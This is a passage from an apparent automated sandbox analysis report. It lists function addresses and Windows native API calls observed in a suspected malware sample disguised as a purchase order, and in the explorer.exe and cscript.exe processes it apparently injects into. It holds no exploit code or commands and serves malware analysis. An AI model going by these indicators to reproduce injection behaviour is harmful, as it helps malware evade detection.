          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42D00 NtSetInformationFile,4_2_04F42D00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42EE0 NtQueueApcThread,4_2_04F42EE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42E80 NtReadVirtualMemory,4_2_04F42E80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42E30 NtWriteVirtualMemory,4_2_04F42E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42FB0 NtResumeThread,4_2_04F42FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42FA0 NtQuerySection,4_2_04F42FA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42F90 NtProtectVirtualMemory,4_2_04F42F90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42F60 NtCreateProcessEx,4_2_04F42F60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42AF0 NtWriteFile,4_2_04F42AF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42AB0 NtWaitForSingleObject,4_2_04F42AB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42BA0 NtEnumerateValueKey,4_2_04F42BA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42B80 NtQueryInformationFile,4_2_04F42B80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F43090 NtSetValueKey,4_2_04F43090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F43010 NtOpenDirectoryObject,4_2_04F43010
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F43D70 NtOpenThread,4_2_04F43D70
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F43D10 NtOpenProcessToken,4_2_04F43D10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F439B0 NtGetContextThread,4_2_04F439B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBA360 NtCreateFile,4_2_02DBA360
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBA490 NtClose,4_2_02DBA490
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBA410 NtReadFile,4_2_02DBA410
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBA540 NtAllocateVirtualMemory,4_2_02DBA540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBA35C NtCreateFile,4_2_02DBA35C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBA40B NtReadFile,4_2_02DBA40B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBA53A NtAllocateVirtualMemory,4_2_02DBA53A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_0142D5BC0_2_0142D5BC
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B65D380_2_05B65D38
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B6618B0_2_05B6618B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B6C0200_2_05B6C020
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B65D280_2_05B65D28
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B625700_2_05B62570
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B625600_2_05B62560
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B69CAB0_2_05B69CAB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B69CE00_2_05B69CE0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B68F700_2_05B68F70
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B68F610_2_05B68F61
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B627500_2_05B62750
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B627400_2_05B62740
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B6D6F80_2_05B6D6F8
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B6612C0_2_05B6612C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B661170_2_05B66117
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B621100_2_05B62110
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B621000_2_05B62100
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B668F10_2_05B668F1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B670300_2_05B67030
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B6C0100_2_05B6C010
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B600060_2_05B60006
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B600400_2_05B60040
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B670400_2_05B67040
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B6CB780_2_05B6CB78
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B6CB690_2_05B6CB69
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B632B80_2_05B632B8
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B61A980_2_05B61A98
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B61A880_2_05B61A88
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B622F80_2_05B622F8
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B622E80_2_05B622E8
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B6321D0_2_05B6321D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B6BA700_2_05B6BA70
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B6BA600_2_05B6BA60
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_07FBA4580_2_07FBA458
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_07FB5F580_2_07FB5F58
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_07FB4CB80_2_07FB4CB8
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_07FB4CB10_2_07FB4CB1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_07FB44480_2_07FB4448
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_07FB443B0_2_07FB443B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_07FB63900_2_07FB6390
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_07FB48800_2_07FB4880
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_07FB48700_2_07FB4870
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_004010262_2_00401026
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041E1E52_2_0041E1E5
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041E2662_2_0041E266
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_004012082_2_00401208
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041DAE62_2_0041DAE6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041DB922_2_0041DB92
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041DD872_2_0041DD87
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041D5A32_2_0041D5A3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041E5B42_2_0041E5B4
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_00409E602_2_00409E60
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041DEB92_2_0041DEB9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C81582_2_017C8158
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_018001AA2_2_018001AA
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DA1182_2_017DA118
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017301002_2_01730100
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F81CC2_2_017F81CC
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F41A22_2_017F41A2
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D20002_2_017D2000
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FA3522_2_017FA352
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_018003E62_2_018003E6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174E3F02_2_0174E3F0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E02742_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C02C02_2_017C02C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_018005912_2_01800591
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017405352_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F24462_2_017F2446
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E44202_2_017E4420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EE4F62_2_017EE4F6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017407702_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017647502_2_01764750
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173C7C02_2_0173C7C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175C6E02_2_0175C6E0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017569622_2_01756962
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0180A9A62_2_0180A9A6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A02_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174A8402_2_0174A840
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017428402_2_01742840
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E8F02_2_0176E8F0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017268B82_2_017268B8
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FAB402_2_017FAB40
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F6BD72_2_017F6BD7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173EA802_2_0173EA80
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DCD1F2_2_017DCD1F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174AD002_2_0174AD00
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173ADE02_2_0173ADE0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01758DBF2_2_01758DBF
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740C002_2_01740C00
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01730CF22_2_01730CF2
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0CB52_2_017E0CB5
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B4F402_2_017B4F40
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01760F302_2_01760F30
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E2F302_2_017E2F30
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01782F282_2_01782F28
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01732FC82_2_01732FC8
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BEFA02_2_017BEFA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740E592_2_01740E59
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FEE262_2_017FEE26
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FEEDB2_2_017FEEDB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01752E902_2_01752E90
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FCE932_2_017FCE93
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172F1722_2_0172F172
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0177516C2_2_0177516C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174B1B02_2_0174B1B0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0180B16B2_2_0180B16B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F70E92_2_017F70E9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FF0E02_2_017FF0E0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EF0CC2_2_017EF0CC
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017470C02_2_017470C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172D34C2_2_0172D34C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F132D2_2_017F132D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0178739A2_2_0178739A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175D2F02_2_0175D2F0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E12ED2_2_017E12ED
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175B2C02_2_0175B2C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017452A02_2_017452A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F75712_2_017F7571
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_018095C32_2_018095C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DD5B02_2_017DD5B0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017314602_2_01731460
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FF43F2_2_017FF43F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FF7B02_2_017FF7B0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017856302_2_01785630
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F16CC2_2_017F16CC
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017499502_2_01749950
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175B9502_2_0175B950
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D59102_2_017D5910
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AD8002_2_017AD800
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017438E02_2_017438E0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FFB762_2_017FFB76
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B5BF02_2_017B5BF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0177DBF92_2_0177DBF9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175FB802_2_0175FB80
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B3A6C2_2_017B3A6C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FFA492_2_017FFA49
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F7A462_2_017F7A46
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EDAC62_2_017EDAC6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DDAAC2_2_017DDAAC
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01785AA02_2_01785AA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E1AA32_2_017E1AA3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F7D732_2_017F7D73
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F1D5A2_2_017F1D5A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01743D402_2_01743D40
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175FDC02_2_0175FDC0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B9C322_2_017B9C32
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FFCF22_2_017FFCF2
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FFF092_2_017FFF09
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01703FD22_2_01703FD2
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01703FD52_2_01703FD5
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FFFB12_2_017FFFB1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01741F922_2_01741F92
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01749EB02_2_01749EB0
          Source: C:\Windows\explorer.exeCode function: 3_2_0E63E2323_2_0E63E232
          Source: C:\Windows\explorer.exeCode function: 3_2_0E63D0363_2_0E63D036
          Source: C:\Windows\explorer.exeCode function: 3_2_0E6340823_2_0E634082
          Source: C:\Windows\explorer.exeCode function: 3_2_0E638B323_2_0E638B32
          Source: C:\Windows\explorer.exeCode function: 3_2_0E638B303_2_0E638B30
          Source: C:\Windows\explorer.exeCode function: 3_2_0E635D023_2_0E635D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0E63B9123_2_0E63B912
          Source: C:\Windows\explorer.exeCode function: 3_2_0E6415CD3_2_0E6415CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0F27AB323_2_0F27AB32
          Source: C:\Windows\explorer.exeCode function: 3_2_0F27AB303_2_0F27AB30
          Source: C:\Windows\explorer.exeCode function: 3_2_0F2802323_2_0F280232
          Source: C:\Windows\explorer.exeCode function: 3_2_0F277D023_2_0F277D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0F27D9123_2_0F27D912
          Source: C:\Windows\explorer.exeCode function: 3_2_0F2835CD3_2_0F2835CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0F27F0363_2_0F27F036
          Source: C:\Windows\explorer.exeCode function: 3_2_0F2760823_2_0F276082
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_007071104_2_00707110
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FBE4F64_2_04FBE4F6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC24464_2_04FC2446
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FD05914_2_04FD0591
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F105354_2_04F10535
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F2C6E04_2_04F2C6E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F0C7C04_2_04F0C7C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F107704_2_04F10770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F347504_2_04F34750
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FA20004_2_04FA2000
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC81CC4_2_04FC81CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FD01AA4_2_04FD01AA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F981584_2_04F98158
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FAA1184_2_04FAA118
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F001004_2_04F00100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F902C04_2_04F902C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FB02744_2_04FB0274
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F1E3F04_2_04F1E3F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FD03E64_2_04FD03E6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCA3524_2_04FCA352
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F00CF24_2_04F00CF2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FB0CB54_2_04FB0CB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F10C004_2_04F10C00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F0ADE04_2_04F0ADE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F28DBF4_2_04F28DBF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F1AD004_2_04F1AD00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCEEDB4_2_04FCEEDB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F22E904_2_04F22E90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCCE934_2_04FCCE93
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F10E594_2_04F10E59
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCEE264_2_04FCEE26
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F02FC84_2_04F02FC8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F8EFA04_2_04F8EFA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F84F404_2_04F84F40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F30F304_2_04F30F30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F52F284_2_04F52F28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F3E8F04_2_04F3E8F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04EF68B84_2_04EF68B8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F1A8404_2_04F1A840
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F128404_2_04F12840
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F129A04_2_04F129A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FDA9A64_2_04FDA9A6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F269624_2_04F26962
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F0EA804_2_04F0EA80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC6BD74_2_04FC6BD7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCAB404_2_04FCAB40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F014604_2_04F01460
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCF43F4_2_04FCF43F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FAD5B04_2_04FAD5B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC75714_2_04FC7571
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC16CC4_2_04FC16CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCF7B04_2_04FCF7B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC70E94_2_04FC70E9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCF0E04_2_04FCF0E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F170C04_2_04F170C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FBF0CC4_2_04FBF0CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F1B1B04_2_04F1B1B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FDB16B4_2_04FDB16B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F4516C4_2_04F4516C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04EFF1724_2_04EFF172
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F2D2F04_2_04F2D2F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FB12ED4_2_04FB12ED
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F2B2C04_2_04F2B2C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F152A04_2_04F152A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F5739A4_2_04F5739A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04EFD34C4_2_04EFD34C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC132D4_2_04FC132D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCFCF24_2_04FCFCF2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F89C324_2_04F89C32
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F2FDC04_2_04F2FDC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC7D734_2_04FC7D73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC1D5A4_2_04FC1D5A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F13D404_2_04F13D40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F19EB04_2_04F19EB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCFFB14_2_04FCFFB1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F11F924_2_04F11F92
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCFF094_2_04FCFF09
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F138E04_2_04F138E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F7D8004_2_04F7D800
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F199504_2_04F19950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F2B9504_2_04F2B950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FA59104_2_04FA5910
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FBDAC64_2_04FBDAC6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F55AA04_2_04F55AA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FADAAC4_2_04FADAAC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F83A6C4_2_04F83A6C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCFA494_2_04FCFA49
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC7A464_2_04FC7A46
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F85BF04_2_04F85BF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F4DBF94_2_04F4DBF9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F2FB804_2_04F2FB80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCFB764_2_04FCFB76
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBE2664_2_02DBE266
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBE1E54_2_02DBE1E5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBE5B44_2_02DBE5B4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBD5A34_2_02DBD5A3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBDAE64_2_02DBDAE6
